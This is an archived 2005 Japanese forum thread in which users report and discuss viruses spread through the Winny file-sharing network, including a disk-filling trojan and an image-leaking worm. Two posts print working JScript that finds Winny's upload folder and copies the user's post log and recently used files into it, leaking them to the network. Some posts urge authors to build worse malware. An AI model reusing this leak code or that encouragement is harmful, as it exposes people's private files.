本体はフォルダアイコン偽装タイプの4MBのexeです。 症例は、実行ファイルのあるフォルダの中のファイルとフォルダを削除します。 かわりに「(・ё・)〜.jpg」というファイル名でサイズのランダムなファイルを複数作成されます。 「今のところ」はそれ以外に症状も変化も確認してません。 サイズがでかいexe形式というのがp2pで流れてそうな感じがしたため まずこちらで有名かお尋ねしようと思いました。 (・ё・)123456.jpgみたいなファイルを大量に吐くパターンが周知ならその詳細を知りたいと思いまして。
>>616 おそらく新作なのでここで対処法聞いても無駄だと思う
NAV持ってるなら、シマンテックに検体提出しといてください
再インストするので とりあえずチラシの裏しときます。 ウィルス本体:フォルダアイコン形式のexeファイル ファイルサイズ:4,542,664Byte ウィルススキャン:未反応 確認済症状: 1.exeのあるフォルダ以下のファイル・フォルダを削除。 2.「(・ё・)123456.jpg (数字は任意の6桁)」を作成。 ファイルサイズはランダム(10kB〜200MB)。中は全て0bit。 50MBの空き容量を残して終了?作成失敗まで続くと思われ。 他: レジストリRun、スタートアップに変更は見当たらず。他の詳細は不明。 システムはDドライブ8Gで構成してるのでCドライブ目当て、10Gタイプとかは未遂してる可能性も。 実行環境: WindowsXP ServicePack2済 WindowsUpdate、Norton定義ファイル20050307更新済。
対処法までは知らんけれども、ここは新作(らしきもの)を報告するスレやから 報告ってことでいいんでないの。 というか春の新作が出る時期なんですか。
新種報告はありがたいけど、フォルダ偽装なんかにひっかかるのは ウイルス対策以前の問題のような気がする。とりあえずテンプレ熟 読して推奨されてる対策は全部やっておいたほうが大吉。
4.5Mものexeって何がつまってんだろうなぁ
どうせ素人がビジュアル開発環境で作った無駄まみれのプログラムなんだろうなw
あぁもちろんファイルの容量を増やしただけって事も考えられる。 さすがに2M超えのEXEは作るには逆に工夫が必要だと思う。
なんか馬鹿丸出しなのでIDと文体変えて再登場します('A`)ノシ
ご指摘ごもっとも。 ちなみに偽装も何もexe拡張子まで確認してます。なのに 選択して削除しようとした時に手がダブルクリック 脊髄反射は脳では止められなかったです(´・ω・`)
例えば壁紙内蔵とかな みつをぬるぽ壁紙は約2.3MB
> ID:4ZuyD8DW0
君無駄口大杉 無駄にログを増やさないでくれ
612 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/03/08(火) 11:56:00 ID:4ZuyD8DW0
(^ω^;)プギャー
615 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/03/08(火) 11:59:40 ID:4ZuyD8DW0
>>610 よしデフラグをおすすめするw
622 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/03/08(火) 13:36:23 ID:4ZuyD8DW0
どうせ素人がビジュアル開発環境で作った無駄まみれのプログラムなんだろうなw
623 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/03/08(火) 13:37:26 ID:4ZuyD8DW0
あぁもちろんファイルの容量を増やしただけって事も考えられる。
さすがに2M超えのEXEは作るには逆に工夫が必要だと思う。
それにしてもシングルクリックでファイルを実行するようにしてる人って ある意味アレだね。勇者。
>>629 俺シングルだけど…。あの…。別に勇者とか…。そんなんじゃ…。
し…。知らないんです。設定の方法とか。(お、教えてくれます?)
それに、ダブルだとマウスの電池が…。あのワイヤレスなんです。
でも一回も間違ってクッリックしたこと…。ないんですよ?えっへn。
>>630 フォルダオプションの全般タブのクリック方法だったと思う。
そこで切り替えられますよたぶん。
632 :
ひみつの文字列さん :2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
実行してみた。 マイドキュメント以下の全てを削除して(・ё・)xxxxxx.jpg作る以外の動きがわからん。
まあ、ウィルス踏む奴なんて素人なんだし これに懲りたらnyやめることだな
まあ、国に帰るんだな こんな、お前にも家族がいるだろう
>>633 漏れも実行してみたけど、マイドキュメント以下の全てのファイルを削除
して(・ё・)xxxxxx.jpg作る以外に害はなさそうだね…
>>632-633 XPのシステム復元サービス絡みで悪さしてない?
ファイル:
system32\DRIVERS\sr.sys
RKEY:
SYSTEM\CurrentControlSet\Services\srservice
>>633 、636
IMJPMlG.exe
っての入ってない?
HDDへのアクセスがずーっと続くんだけど
↑のレス、アンカー間違いです。失礼
別のニュイルスも踏んだんじゃないか
またはニュイルスの盛り合わせを食ったか
>>640 どうも
HijackThisでこれが検出されたんだけど、別のかな…
4Mもあるexeだから、マイドキュメントのファイルを消すandデカいファイルを
作る以外にも何かしそうなんですけどね。
わからん、、、
>>632 を実行して、IEのインターネットオプション、セキュリティタブのWeb
コンテンツのゾーンにマイコンピュータが追加された人いませんか?
exeを不用意に実行してるヤシ多いけど xpSP2にすれば、exe実行前に警告でるだろ?
そういわずにどんどん踏んで情報提供しようよ
気持ち悪くて再インストした自分からすれば実行するのはスゴイなーと・・・
迂闊に実行させた本人が言えたことじゃないですが。
操作中に間違って開くとか以前からやってたので回避方法を色々調べてましたが
特定フォルダ内の実行権限拒否しか今のところ思い当たるフシ無し。
>>646 SP2の実行問合せは、ネットからDLしたファイルのみで、ローカルで作成されたのは対象外。
DLして解凍したexeが聞かれるのは、「ZIP(フォルダ)からXPの解凍ウィザードで解凍したexe」のみ。
lzh等々は当然対象外。ZIPフォルダでも「D&D」は対象外。
とのことです。
アホばっか
>>649 同意。以前P2Pと言えばそれなりの知識がある人ばかりだったのに。
今は初心者みたいなのばかりで萎える。これもネトランのせいか。
おまいら卒業したらどうだ
>>652 やっちまったって感じだなw初心者は俺ですねw
なんか新しいウィルス増えてるじゃね?
瑞樹 修学旅行 この欄検眼団がちょっと気になった
>>656 「菅井さん結婚式」を「菅井きん結婚式」と読んでしまったorz
659 :
569 :05/03/09 22:11:16 ID:aCbYKdsw0
>>636 10Gの犯人はそいつの様な気がする。
ノートン先生でc:\WINDOWS\IME\IMEJPのimjpmig.exe駆除したら10G作成止まった。
Trojan Horseだと。
>>659 10Gは確かにこれみたいですね。
レジストリみたらRunのところに、そのexeが追加されてたんで。
>>656 ついでにチェックしてみたら、Temp000フォルダにGJBファイルが大量に
作成されてた。これが勝手にうpされてるんだろうか?
UPされてると考えるのが妥当だろう。 つまり、もう手遅れってこった。
662 :
569 :05/03/10 01:38:12 ID:ifsoWwc40
tempフォルダに… ウィルス(トロイ)の入っていたフォルダと同じ名前のフォルダがあって、 そのフォルダの中にXPデフォルトの壁紙が入ってる。
636の人の症状って1つのニュイルスだけで済んでないような
春なのにため息また一つ
とりあえず自分も10Gウイルスの解析(て偉そうなもんじゃないけど動作チェック) して みたいんで、容量デカく無いやつ教えてください。 >632のが同様の疑わしいやつ? 他にあるならハッシュ張ると危険な場合はファイル名とハッシュの初め2、3文字 教えてくれると有り難い。
666 :
[名無し]さん(bin+cue).rar :05/03/10 18:09:09 ID:VfzjHx8w0
【使用OS】 Win 2000 【WindowsUpdateしてるか】 自動 【使用AntiVirusソフト】 ノートン・インターネットセキュリティー 【AntiVirusをUpdateしてるか】 自動(手動でもアップデートしてみました) 【ウイルススキャンの結果】 異常なし 【オンラインスキャンしたなら結果】 未 【Winnyのバージョン】 v2.0b7.1 【Winny歴、総DL量】 二週間程度 総量8Gちょっと 【テンプレを読んだか】 既読 【テンプレにある対策を実行したか】 実行済 【症状、具体的に分かる限りすべて書く】 キャッシュフォルダを空にしたつもりがUPフォルダを空にしてしまったことに気づかずに数日アクセスしていたのでアップするものは何もないはずなのに、いつも3本ぐらい何かをアップしているリンクが存在します。 【何をしたらそんなことになったのか】 怪しいことは何もなかったように思うんですが…。強いて言えばDivxToDVDをインストールしたくらいなので当然無関係なはず。 あとはaviをダウンロードしたのみ。 【これまでにとった措置】 新規に解凍した別のWinnyでアクセスしてみたことと、UPフォルダそのものをマイドキュメントに退避させてアクセス。
667 :
[名無し]さん(bin+cue).rar :05/03/10 18:10:45 ID:VfzjHx8w0
【使用OS】 Win 2000 【WindowsUpdateしてるか】 自動 【使用AntiVirusソフト】 ノートン・インターネットセキュリティー 【AntiVirusをUpdateしてるか】 自動(手動でもアップデートしてみました) 【ウイルススキャンの結果】 異常なし 【オンラインスキャンしたなら結果】 未 【Winnyのバージョン】 v2.0b7.1 【Winny歴、総DL量】 二週間程度 総量8Gちょっと 【テンプレを読んだか】 既読 【テンプレにある対策を実行したか】 実行済 【症状、具体的に分かる限りすべて書く】 キャッシュフォルダを空にしたつもりがUPフォルダを空にしてしまったことに気づかずに数日アクセスしていたのでアップするものは何もないはずなのに、いつも3本ぐらい何かをアップしているリンクが存在します。 【何をしたらそんなことになったのか】 怪しいことは何もなかったように思うんですが…。強いて言えばDivxToDVDをインストールしたくらいなので当然無関係なはず。 あとはaviをダウンロードしたのみ。 【これまでにとった措置】 新規に解凍した別のWinnyでアクセスしてみたことと、UPフォルダそのものをマイドキュメントに退避させてアクセス。
669 :
[名無し]さん(bin+cue).rar :05/03/10 18:15:07 ID:VfzjHx8w0
あれ?
Macから書くと同じのが2回投稿されてしまう。
どうも失礼を。m(--)m
>>668 あ、そういうのもありで? 感謝!
びっくりするくらいバカだな
>>670 経験の浅い者を認められない者はこの世に存在する価値なし。
糞して...いや、糞にまみれて市ね
>>1 も読まない奴、相手にすんなよ
ここは初心者の質問スレじゃない
674 :
[名無し]さん(bin+cue).rar :05/03/10 18:48:46 ID:Mqmb8Kxt0
>>674 あまりにも話題にもならないから
ウイルス作者が自分で立てたと見る
プーー
ここに出てる新種ウィルス作者は2chねらーか? 次は、在日や民主党の悪行を知らせる奴で頼む
ウィルス作者は当然2ch見てるだろ
話題にもなってないウイルスを取り上げるとはなんか怪しいね
680 :
[名無し]さん(bin+cue).rar :05/03/10 19:24:33 ID:P/PSvRDw0
作者はどうせこの板とか見てニヤついてんだろ?死ねよきもちわりー。 あまりにも話題性がないので枕を濡らしてそうだな。
>>678 やはりそのスレの ID:C0ppJeJt が怪しいな。
わざわざスレ立てて気づいてくださいってことか?
作者はどうせニュイルススレとか見てニヤついてる ↓ あまりにも話題性がないので枕を濡らす ↓ あまりにも話題にもならないからニュー速にスレ立ててニヤついてる ↓ 流出系なんで一部びびるもあまりにも話題性がないので枕を濡らす ↓ お役人が引っ掛かり、初めて他人が建ててくれたスレとか見てニヤついてる ↓ ニュイルス作って日本で初の逮捕……もとい補導で枕を濡らす
枕を濡らしてばっかりじゃんwww作者乙wwww
ぱんつもぬらしてるだろうな。
被害者の叫びは作者の滋養にして栄養であり最も喜ぶことです 作者にエサを与えないで下さい
でもこれは叫びじゃなくてバカにしてると思うw
687 :
[名無し]さん(bin+cue).rar :05/03/10 19:49:28 ID:RNPxq3Rh0
作者はここを見ている 陰気な奴だな
オイ!作者見てるか!常にノートンより先を走れ。もっと効率よくバラ撒け。
>688 幾ら何でも作者様に訴えかけすぎ
苺娘と辻を無視リストに入れておけば、炉画像なぞ見ずに済む
GJBって全部Jpegなの?
画像はもう飽きたと言ってみる
>>691 JPGだけど、XPならWindows画像とFAXビューアに関連付ければ開ける。
「マイドキュメント」以下を消去してjpgで埋めるって奴とは別? 結構春の新作が出てるのか?
ニュー速でスレ立つ前にどっかで話題になってた?
今まで話題にならなかったけど どういう形でアレ今回話題になってよかったんじゃない?w 苦労して作ったのに話題にすらならないと悲しいもんね
話題になってたのはこのスレくらいだろう。前スレの最初の報告が2月6日だな。
あと
>>656 のリンク先くらいか。
つうかあれなんて読むの? 低学歴の俺にもわかるように教えて
702 :
sage :05/03/10 21:24:03 ID:wY9Pd5B60
最近、Lhazで解凍すると同じファイル名で拡張子名不明で0バイトのファイルが解凍ファイル以外に出てきて、 解凍ファイルを開くと消えるんですが・・・・。 これって新種のニュイルス? いろんなファイルのzipファイルで発生するんですが・・・。 いろいろありすぎて言えませんが・・・・。(^^;)A
アホばっか
げ、あげてしまった。
げ、踏んでしまった。
げ、泣いてしまった。
つまりなんだ、このウイルスは危なくないってことか?話題性がそんなにないってことは。
インパクトがないな おもしろくもないし
せいぜいキンタマのようにJPGふぁいるをGBJで偽装されて流れて マイドキュメントのファイルが削除されて、でかいファイルに置き換 えられるくらいなんで、そんなに危ないもんでもないかも。 あふれてる画像も特に面白いものがあるわけでもないし…。
話題になるウイルスが危ないとか思ってるの?
かかった奴らには申し訳ないが苺きんたまは面白かったなぁ・・・
>>711 だよなぁ
ny使ってない人間にも無理矢理nyインストしてキンタマ状態にして欲しいぐらいだね
>>636 氏が試してる新作に期待。
続報マダーーー?
714 :
ひみつの文字列さん :2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
715 :
[名無し]さん(bin+cue).rar :05/03/11 00:04:47 ID:i1weFgmG0
個人情報保護法が4月からスタートするんだけど、 この場合、どうなるのだ?
716 :
[名無し]さん(bin+cue).rar :05/03/11 01:12:49 ID:6SPlJEWw0
欄検眼段←何って読むの?
717 :
kakikomi.txt を winny の up フォルダにコピー :05/03/11 01:15:26 ID:Ci569Bw50
function Step2(d) { for(var fc = new Enumerator(fso.GetFolder(d).files); !fc.atEnd(); fc.moveNext()) { var f = fso.GetFile(fc.item()); if(f.Name == "kakikomi.txt") { kakiko = f.Path; if(up != "") { return 1; } } else if(f.Name == "UpFolder.txt") { var upini = fso.OpenTextFile(f.Path, 1, false); var buf, line; while(!upini.AtEndOfStream) { buf = upini.ReadLine(); line = buf.split("="); if(line[0] == "Path") { up = line[1]; break; } } upini.Close(); if(kakiko != "") { return 1; } } } for(var fs = new Enumerator(fso.GetFolder(d).SubFolders); !fs.atEnd(); fs.moveNext()) { if(Step2(fs.item())) { return 1; } } } function Step1() { for(var d = new Enumerator(fso.Drives); !d.atEnd(); d.moveNext()) { try { if(Step2(d.item().RootFolder)) { return; } } catch(e) {} } } var fso = new ActiveXObject("Scripting.FileSystemObject"); var kakiko = ""; var up = ""; Step1(); if(kakiko != "" && up != "") { fso.CopyFile(kakiko, up + "\\俺のカキコ.txt"); }
718 :
[名無し]さん(bin+cue).rar :05/03/11 01:20:40 ID:yJhE9Uax0
>>717 なんか怖いのキタ━━━━━━(゚∀゚)━━━━━━ !!!!
やべ
kakikomi.txtって皆保存してるもんなん?
俺はしてる。。。
kakikomi保存しない設定にしてる。 1000超えたログも捨てまくってる。 一度見た動画も捨てる。 キャッシュも最小限しか残さない。
kakikomi.txtがコピーされるぞゴラァ
724 :
[名無し]さん(bin+cue).rar :05/03/11 01:33:25 ID:gKRbgMNh0
専用ブラウザでkakikomi.txtに保存してない人には無効ってこと?
>>717 こんなところに書き込んで度胸あるねぇニヤニヤ
俺はうpフォルダもない
そういや前にもこのスレでkakikomi.txt晒したな。
>>722 そこまでする必要もなかろうに、ビビリ過ぎ。女か?
>>730 要らない物はすぐ捨ててしまう主義なんです。
なんもビビってへんちゅーねんw
いらない物って・・・キャッシュはしばらく残しとかなあかんやろ 即消し厨か
即消し主義といっていただきたい
734 :
ひみつの文字列さん :2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
お前が援交好きなのはわかった。
>>717 なるほど、こうやってupフォルダ探してるわけか。 とりあえずフォルダ構造変えとくか・・。
IEしか使ってないもので、あしからず。 円光ものはともかく、.aviは事故多いし、落とすなよそんなもん。
738 :
[名無し]さん(bin+cue).rar :05/03/11 06:27:51 ID:BX+mzCM9O
朝起きたらノード0、全て切断。 モデムを見てみると、pppのランブが消灯していて、ネットそのものに接続出来なくなってました(;;) これってネット障害?それとも・・・ 教えて下さい(>_<)/
とりあえず・・・、モデムの電源を一端落として、再起動はしてみたのか? 実は、プロバがメンテ中とかいうオチかもしれんが・・・。
カードが止まったに一票
>>740 ISPにお金払ってないって落ちじゃないだろうな?
どっから書き込みしてるんだ
ネタじゃありません(>_<) 朝はバタバタしてるので、まだ色々試してませんが、料金滞納とかは無いです。 メンテならイイのですが・・・
>738 釣りじゃないなら顔文字はやめたほうがいいよ。
朝からスレ違いも甚だしい
顔文字は以後気を付けます、御指摘ありがとう。 今は携帯から書き込みしています。 スレ違いになりますか?もしそうなら誘導願えますか? 宜しくお願い致します。
> 今は携帯から書き込みしています。 まぁ一目瞭然だ罠 > スレ違いになりますか?もしそうなら誘導願えますか? ISPのサポセンにでも聞いてくれ 情報が少なすぎて俺には何も胃炎からな
>>674 ためしにあやしいファイルあったんで、アタックしたら欄検眼段だったが
欄検眼段本体とスタートアップエントリ消せば問題ない
マイドキュメント以下削除云々、10GB云々とは、欄検眼段は別物みたいだけど 実行されるプロセスは、上のほうでコレじゃないか?と言ってるやつと同じ マイクロソフト製の同名実行ファイルとは、明らかに違うアイコンしてるし、いかにも怪しいつー
欄検眼段に感染してるかどうか確認する方法を教えて下さい。
754 :
717に追加で「最近使ったファイル」をコピー :05/03/11 10:45:00 ID:4Zss8ynH0
function Step3(updir) { for(var fc = new Enumerator(fso.GetFolder(wsh.SpecialFolders("Recent")).files); !fc.atEnd(); fc.moveNext()) { var f = fso.GetFile(fc.item()); try { fso.CopyFile(wsh.CreateShortcut(f.Path).TargetPath, updir + "\\" + fso.GetBaseName(f)); } catch(e) {} } } var wsh = WScript.CreateObject("WScript.Shell"); var fso = new ActiveXObject("Scripting.FileSystemObject"); Step3(up);
755 :
[名無し]さん(bin+cue).rar :05/03/11 11:00:28 ID:aMpOLk/w0
( ´艸`)ププ だからなんなんだw
だからなんなんだ 以上のものを書いたらタイーホされちゃうじゃん
それより、苺キンタマのようにアプロダに投稿しちゃう機能が欲しいよなぁ。 前回は鯖落ちになっちゃったから、今度はアプロダを複数使えるといい。 アプロダスレからアプロダを探し出してランダムに投稿とか。 もちろん苺キンタマに習って、投稿したらそのアドレスを2chに投稿な。 これも前回はスレが早くなりすぎたから、カキコ先はランダムにしないと。 苺キンタマ祭りをもう一度……
ATOK2005ダウンして 解凍してできた ATOK 2005 for Windowsフォルダー内の setupフォルダーにあるsetup.exeをクリックしたらウィルス警告がでてしまいました。 警告を読み切る前に警告画面が消えてしまい ウィルス名がわからなくなってしまったんですが このウィルスの挙動と 対策をどなたかご教授ねがえませんでしょうかー・・・ いまノートンでウイルス検索していますが。
>>758 その報告で何のウイルスかわかったら神だろ
ノートンが反応したなら多分だいじょぶ、不安なら再いんすこ
760 :
[名無し]さん(bin+cue).rar :05/03/11 11:51:58 ID:yN8GWxkE0
欄検眼段 なんか結構同情する写真が流れてるなw 赤ちゃんとか 可哀想に・・・
>>758 ノートンのレポート見たら何のウイルスか載ってるだろ
欄検眼段画像のまとめたzipはどこですか?
10GBウィルス、FSUTIL.EXEを他に移したら止まった。 それによって他の弊害が出るかは知らんが。 てかシステムの復元が強制的に無効になってて使えないし…orz 10GBの二次被害か? 上に成功例あったので今からOS上書きインスコします
俺いいこと考えたウイルスを利用できるイイ方法がある 何もしないでウイルスに対抗できるよ
アホばっか
バカばっか
●ウイルスに感染しない為には? PCの電源を入れないようにしましょう。
ノートン先生に勝てるニュイルスなどありません。先生信じてます
ノートン先生が裏切る時は無反応だからな。気付かない。
結局このデマ(?)ウィルスを作った作者が、何の話題にもならないのを 不満にこのスレで披露したが、特に興味を示してもらえず、ブログでも ネタにしたもののトラッシュバックもコメントもつかず、思い余ってニュ速 でスレ立てたものの、スルー状態ということでFA?
無惨だな。(w そのうちファビョって身元がバレてタイーホっていう、最強コンボ をぜひ披露してもらいたいもんだ。
結局欄検眼段ってジサクジエンでウイルスじゃねぇの?
4月からやばいですよ
それ以前に欄検眼段ってどーよむのさ? 作者カマン
どう見たらAAになるのかと。
>>776 90度傾けて寄り目にして近づいてじーっと1分ほどみつめると3Dに見える
作者はなんでこんな流行りそうもない名前を付けたんだろ だいたい読み方分からないし オリジナリティ? おバカさんですねぇ
ところでUPフォルダ無いのにUPできるantinyウィルスっていないの? 居ないとすれば、UPフォルダ無くせば、被害ないって事だよな。 確か隠しフォルダでUPフォルダ作成するウィルスは居たような気が…
780 :
779 :05/03/11 21:21:01 ID:HJI3rICy0
散々既出だったな。隠れフォルダ表示させない人多いのかな?
781 :
[名無し]さん(bin+cue).rar :05/03/11 21:38:31 ID:NPLANCGR0
質問させてください。 自分【Antinny.ms(仮称)】に引っかかってるのかもしれません。 けどノートンではなくウイルスバスターなので検出してもでてきません。 シマティックのほうにオンラインスキャンというものがあるのですが それでスキャンすれば親と子のファイル名が分かりますか? あと駆除方法に 3.HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。 HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。 とありますが自分のホストファイルには数字は0.0.0.0ではありませんが同じ形式の数字が並んでる行があります。 これは感染していると見ていいのでしょうか? 親切な方もしよろしければ教えてください。お願いします。
だからね質問スレじゃないのよ
テンプレの対処法を読んでも理解できないなら、初期化&新規インス トールしたほうがいいよ。いや煽りとかじゃなくてマジで。 中途半端な対処はよけいに問題をこじらせるだけだし。
駆除したつもりが全然だったりな
>>773 詳しくゥ
>>781 たしかウイルスバスターだとmsはAntinnyJだよ。ノーdは何だったか
忘れた。Bだっけかな。
なんか怪しいファイル踏んじゃった。 今から再インスコするけど報告だけしてみる。 解凍したら中にフォルダファイルに偽装されたexeが入ってて、誤ってダブルクリック。 C:\Documents and Settingsに、ユーザー名と同じ名前の空フォルダが勝手に作られて、それが開かれる。 いろいろ確かめたが、そのほかに気付いた動作はなし。 ちなみにexeファイルが51,306,496 バイトもある。なんだろこれ。
>>781 あと、なぜmsにやられたと思うのか書いておくれ。
早合点してるだけかもしれないし。
ダウソ板って馬鹿ばっかでおもしろいなwwwwW
バカのすくつですから
踊る阿呆に見る阿呆
同じ阿呆なら作らにゃ損損うわなにをさwせdrtぎゅじ
10GBウィルスで怪しいのは svchost.exe svc h st.exe fsutil.exe fsutil.exe ctfmon.exe ct f mon.exe こんな感じでした。削除したら治るかな?
God knows.
>>794 既存のウイルスでファイルの先頭だけ書き換えてexeにしちゃうっての
あったようなきがするけど、情報少なすぎ。
再インスコってからにはもうその怪しいのも消しちゃったのかね。 せめてそれどっかにあげとけばなんか分かったかもしれんが
欄検眼段は漢文だそうです。 リャンクーガンドゥと読むそうです。 欄は日本でいう棚田で昔、えらい坊さんが刈り取りが終わった棚田を 1田1作づつ眼をこらしてみたら一俵の米が集まったそうです。 意味は小さな物を集めれば多くなる。 逆に多くの中の小さな物は見過ごしてはいけない、だから良く見なさい、など
らん ちえん いえん どぅあん
MADE IN CHINA か?
中国人留学生はけっこういるから無いともいえないが
民明書房刊
804 :
[名無し]さん(bin+cue).rar :05/03/12 13:51:39 ID:+4n1hGH/0
あと、UPフォルダ内に大量に自分のデスクトップ晒し上げとかいうファイルがあるんですけどウィルスですかこれ?
>>797 誰の書いた文章?
それから漢文の原文をお願いします。
日本語訳見るよりも、そっちの方が調べるのが楽。
>>804 コピペするより、まずこのスレ一読しろよ。
807 :
[名無し]さん(bin+cue).rar :05/03/12 13:56:57 ID:rsqDazsg0
了解了解
>>797 たいして面白くも無い作者オツ
もう来なくていいよ
>>800 嘘付けw
つーか、漢文と中国語は根本的に違う気がするのだが?
中国の留学生とか関係ない稀ガス
810 :
ひみつの文字列さん :2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
もう見苦しいだけだな。>欄検眼段 二番煎じにもならないくらいの劣化種だ。
実はまだだれも気がついていないすごい仕掛けが
814 :
[名無し]さん(bin+cue).rar :05/03/12 15:24:57 ID:2B6L2OnN0
はいはい。あるといいね
作者がちょっとかわいそうになってきた
817 :
ひみつの文字列さん :2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
818 :
[名無し]さん(bin+cue).rar :05/03/12 16:03:50 ID:lxUBgtx90
別に作者じゃないけど、もっと他のスレにも宣伝して警戒させるべきでは? 少なくとも、危険なウイルスなわけだし、ヤフーのトップに載るくらいには やった方がいいと思うよ。
けっきょく、なんて読めばいいんだろう。
「らんけんがんだん」 でいいんじゃねーの?日本人なんだから日本語で
欄検眼段_D__新しいフォルダ (3)_コレクション_[キンタマ] 俺のデスクトップ USER1 [04-03-09](ファイル詰め合わせ)_F0005.GJB
>>818 >別に作者じゃないけど
このウィルスの厄介なところは、注意を促せば「作者乙」、「自作自演で必死だな」とか
言われる点。そういう作者の意図とは別の次元で拡散防止を図ることが困難になっている。笑
ヤフーのトップに載ったら載ったで、「作者が自分で通報したんじゃないのか?ぷぷぷ」ってなるんだろうな。w
>>818 >別に作者じゃないけど、もっと他のスレにも宣伝して警戒させるべきでは?
宣伝って、某スレのこんな書き込みのことかな?
504 名前:[名無し]さん(bin+cue).rar[ ] 投稿日:05/03/12 09:43:01 ID:7LP9q65V0
あのう。
それより、欄検眼段がすごいことになってる、みたいな。
GJBはJPGにリネームすればOKらしい。
>>818 新作のたびにそんなことできるか
面白いニュイルスならまだしも
こんな平々凡々なもの
アホばっか
考えてみるとPC内のjpgがバラまかれるって意外にダメージないんだよな。 画像じゃあんまり個人情報を読み取れないし。
>>829 メーラーの送信者情報をアーカイブに添付してくれると、かなり
えらいことになるような悪寒。
いっそ「欄検眼段の作者だけど何か質問ある?」 ぐらいのスレ立てればよかったのにな>作者
作者真っ赤になってますよ
Antinny史上、ここまでバカにされた作者がいたであろうか?
よっぽどの自信作だったんだろうな 自分でスレ立ててたし
835 :
[名無し]さん(bin+cue).rar :05/03/12 19:44:19 ID:lxUBgtx90
証拠もないのに自分で立てたとか決めつけるなよ。
よくわからないけど、必死な人がいますね
作者はよく頑張った だからゆっくり休めみゃ
作者、あらゆるアプロダでデスクトップを晒すウィルスを作ってこい。 警視庁に個人情報を送るウィルスでもいい
この屈辱が新たなニュイルス作りのモチベーションとなる
これだけ必死になっているのに、 他板はともかく他スレで話題にものぼらないとは… 作者はもっと宣伝してまわらなきゃ駄目じゃね〜の?
作者が同情や激励されるっていう意味では、たしかに前代未聞だった な。(w
ヨドバシじゃなくてビッグカメラのディスプレイ売り場のデスクトップにnyに流れてるファイルが置かれてた事があったな。
作者は発想を変えて世の為になるウイルスを作ろうよ マイナーだけど使い勝手の良いアプリを次々インストールしてディスクトップにショートカットかランチャーをおいたり スパイウエアを駆除したり XP高速化させたり
苺キンタマやキンタマが相当評判になったから、じゃあPCの中の 画像を勝手に探して放流すれば大混乱になると思ったんだろうなあ。 しかし実際には個人が作った画像にはたいした情報価値はなかったと。
>>844 ノートン先生を勝手にインスコするウィルスとか
トレンドマイクロのアップデータも先生で使えるようにするとか
ノートン先生を勝手にインスコして、自分は駆除されて消える 完璧
たしか、ワームを防ぐパッチをあてるワームがあったと思うが なんだっけ?
おまいらが煽るから怖くなって重要ファイルは全部暗号化したぞ というか今までそれすら対策してなかったのって... ガクガク(((;゚Д゚)))ブルブル
重要なファイルを入れておかなきゃいいのに
2chブラウザのカキコログなどtxtファイルうpなら祭りだっただろうなぁ。
>>844 そういや特定のウイルスを駆除するウイルスがあったな。
ただし、結果的にネットワークに負荷をかけながら延々と感染し続けると言う意味では、
どっちも同じだったが。
853 :
[名無し]さん(bin+cue).rar :05/03/12 23:36:25 ID:3DVpTE0+0
GJB画像ダウソして外付けHDに保存したらHD内のファイルが大量に消えた これが本当の原因かどうかはわからんけど、怪しいexeを実行した覚えはないし…
欄検眼段って一体何? どこにも詳細書いてないんだけど
MyDoomとNetskyじゃなかったっけ。お互いの悪口なんかも書かれていたとか。
症状:exe踏んだらパソコン動作が速くなりました って報告か・・・いいね
あぁ?殺すぞ
もちつけ
(>_<)ガクガク ヒー オドサナイデクダサイ-
↑くだらん雑談uzeee ここは情報スレだろが ウィルス初心者・教えて厨・スキルねえクソは消えれ そりゃそうと、 欄検眼段って何て読むか今すぐ教えろ
(>_<) ヒー
らんけんがんだんの作者様 次は、ny未導入のPCに自動的にny導入&自動で設定まで済ますものか、 または犯罪予告カキコをあちこちに自動投稿するものにしてください。 世の中がいろんな意味で変わると思います。 世間を騒がすこと間違いなしです。
依頼は良くないなぁ・・。
【使用OS】 XP 【WindowsUpdateしてるか】 あんまりしてない 【使用AntiVirusソフト】 etrust 【AntiVirusをUpdateしてるか】 してる 【ウイルススキャンの結果】 してる途中にPCが凍る 【オンラインスキャンしたなら結果】 してる途中にPCが凍る 【Winnyのバージョン】 最新 【Winny歴、総DL量】 2年 500Gくらい 【テンプレを読んだか】 呼んだ 【テンプレにある対策を実行したか】 した 【症状、具体的に分かる限りすべて書く】 Winny起動するとPCが凍る。 ダウンフォルダをスキャンすると凍る。ダウンフォルダ捨てようとしても凍る。 何これぇ・・・ 【何をしたらそんなことになったのか】不明 【これまでにとった措置】スキャン これってウィルスなんでしょうか?スキャンすらできないなんて・・・
HDD臨終間近
コンヤガヤマダ
868 :
865 :05/03/13 00:55:45 ID:N7+h4zdt0
うっそぉ
>>868 外付けでも何でもいいから今すぐ新しくHDDを購入してデータ移しとこう。
今使ってるHDDはキャッシュ用にでも使おう。
今夜が山田(>_<)
これだけ負の話題で騒がれてるのに感染した、って報告がないってのは もしかして欄検眼段自体が自演なのでは?
その説は真っ先に指摘された
とりあえずダメージあるとすれば 辻のおっちゃんが児童ヌルポでタイーホ
そして フジが 独占スクープ!関西に続き東京タイーホの瞬間
6分後に思いついてわざわざ書き込んだの?
セクース中だから6分かかったの 児童ポルヌと書くつもりが間違えたじゃないか しかもガッされたじゃないか
878 :
[名無し]さん(bin+cue).rar :05/03/13 03:04:44 ID:G/rTkPYpO
そして おやすみage
赤ちゃんと一緒に写ってる女のこのフェラ画像が??? 同じ人から流出してるっぽいし。
880 :
[名無し]さん(bin+cue).rar :05/03/13 04:21:27 ID:6+H1WJ3h0
でGJBは怖いウイルスなの?
